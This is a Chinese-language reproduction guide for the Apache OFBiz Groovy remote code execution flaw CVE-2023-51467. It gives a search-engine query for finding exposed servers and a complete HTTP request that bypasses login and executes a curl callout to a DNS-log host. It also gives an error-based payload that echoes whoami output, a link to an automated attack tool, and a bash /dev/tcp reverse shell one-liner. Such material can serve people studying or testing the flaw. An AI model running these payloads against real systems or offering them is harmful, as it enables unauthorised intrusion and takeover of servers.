Apache OFBiz groovy 远程代码执行漏洞(CVE-2023-51467)复现
Apache OFBiz groovy 远程代码执行漏洞,攻击者可构造请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行。
1.漏洞级别
高危
2.漏洞搜索
fofa
app="Apache_OFBiz"
3.影响范围
Apache OFBiz <= 18.12.10
4.漏洞复现
构造请求包
POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184groovyProgram=import%20groovy.lang.GroovyShell%0d%0a%0d%0aGroovyShell%20shell%20%3d%20new%20GroovyShell()%3b%0d%0ashell.evaluate('%22curl%20CVE-2023-51467.y6x162.ceye.io%22.execute()')
如果dnslog收到了响应,证明漏洞存在
注:content-type为必须正确的,否则服务器会解析失败 导致无法正常响应
5.漏洞利用进阶
5.1 利用脚本
由于该漏洞本身无回显,所以可以利用java报错机制来产生回显,构造如下payload
groovyProgram=throw+new+Exception%28%22whoami%22.execute%28%29.text%29%3B
这种情况下会直接触发java报错 返回到页面,效果如下:
感兴趣的可以直接查看这个项目,有自动化的利用工具:
https://github.com/D0g3-8Bit/OFBiz-Attack
5.2 反弹shell
我们也可以通过直接反弹shell的方式来进一步利用。
bash -i >& /dev/tcp/ip/port 0>&1
注:反弹shell很可能会触发安全机制 导致反弹失败。
